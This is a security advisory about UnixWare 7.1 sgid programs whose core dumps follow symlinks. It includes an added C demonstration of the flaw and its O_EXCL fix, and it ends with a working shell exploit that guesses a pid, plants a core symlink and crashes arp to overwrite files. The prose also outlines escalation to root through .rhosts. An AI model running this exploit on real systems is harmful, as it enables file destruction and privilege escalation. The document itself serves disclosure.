Any user may cause system files to be overwritten with core-dump data. A full root compromise may be possible, though not as a direct shell gain; a few extra tricks are needed.
Credit:
This information has been provided by: Brock Tellier.
UnixWare's sgid binaries are allowed to dump core (suid binaries are not). By "calculating" the pid of the sgid binary we will call, we can create a symlink from ./core.pid to any file that is writable by the group the binary runs as. Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able to play around with. The arp exploit attached below demonstrates how one would overwrite a file using this vulnerability.
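The root cause described above is a dump writer that opens a predictable name (core.pid) and follows whatever already exists there. The following added example is a user-space model of that open call beside a hardened form; it is not UnixWare's kernel code and not part of the original advisory, and the function names, the /tmp scratch directory and the sample file contents are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Write dump data to path with the given extra open(2) flags; 0 or -errno. */
static int write_dump(const char *path, const char *data, int flags) {
    int fd = open(path, O_WRONLY | O_CREAT | flags, 0600);
    if (fd < 0) return -errno;
    int rc = write(fd, data, strlen(data)) < 0 ? -errno : 0;
    close(fd);
    return rc;
}

/* Behaviour the advisory describes: an existing core.<pid> symlink is
 * followed, so its target is truncated and filled with dump data. */
int dump_following_symlinks(const char *path, const char *data) {
    return write_dump(path, data, O_TRUNC);
}

/* Hardened form: O_EXCL fails with EEXIST on any pre-existing name, a
 * symlink included; O_NOFOLLOW is a second guard on the final component. */
int dump_refusing_symlinks(const char *path, const char *data) {
    return write_dump(path, data, O_EXCL | O_NOFOLLOW);
}

/* Constructed scenario in a scratch directory: a file holding "keep" and a
 * core.1234 symlink to it. Returns 1 if the file is unchanged after dump(). */
int target_survives(int (*dump)(const char *, const char *)) {
    char dir[] = "/tmp/coredemoXXXXXX", target[64], core[64], buf[16];
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(core, sizeof core, "%s/core.1234", dir);
    FILE *f = fopen(target, "w");
    if (!f || symlink(target, core) != 0) return -1;
    fputs("keep", f); fclose(f);
    dump(core, "COREDATA");
    if (!(f = fopen(target, "r"))) return -1;
    buf[fread(buf, 1, sizeof buf - 1, f)] = '\0'; fclose(f);
    unlink(core); unlink(target); rmdir(dir);
    return strcmp(buf, "keep") == 0;
}
int main(void) {
    printf("following: intact=%d\n", target_survives(dump_following_symlinks));
    printf("refusing:  intact=%d\n", target_survives(dump_refusing_symlinks));
    return 0;
}
```

Creating the dump file exclusively means a pre-planted name costs the process its core file but never redirects the write.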
Why is a root compromise possible?
Well, assuming that we could somehow get "+ +" on a line by itself in the core file, we could have it written to the .rhosts file of some group-writable directory (directory/.rhosts). Gaining the additional privileges of any system account is usually a fast ticket to root.
Exploit:
#!/bin/sh
####
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial. Any sgid program which will coredump can be used
# -Brock Tellier, btellier@usa.net
####
pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print 'A' x 10000"`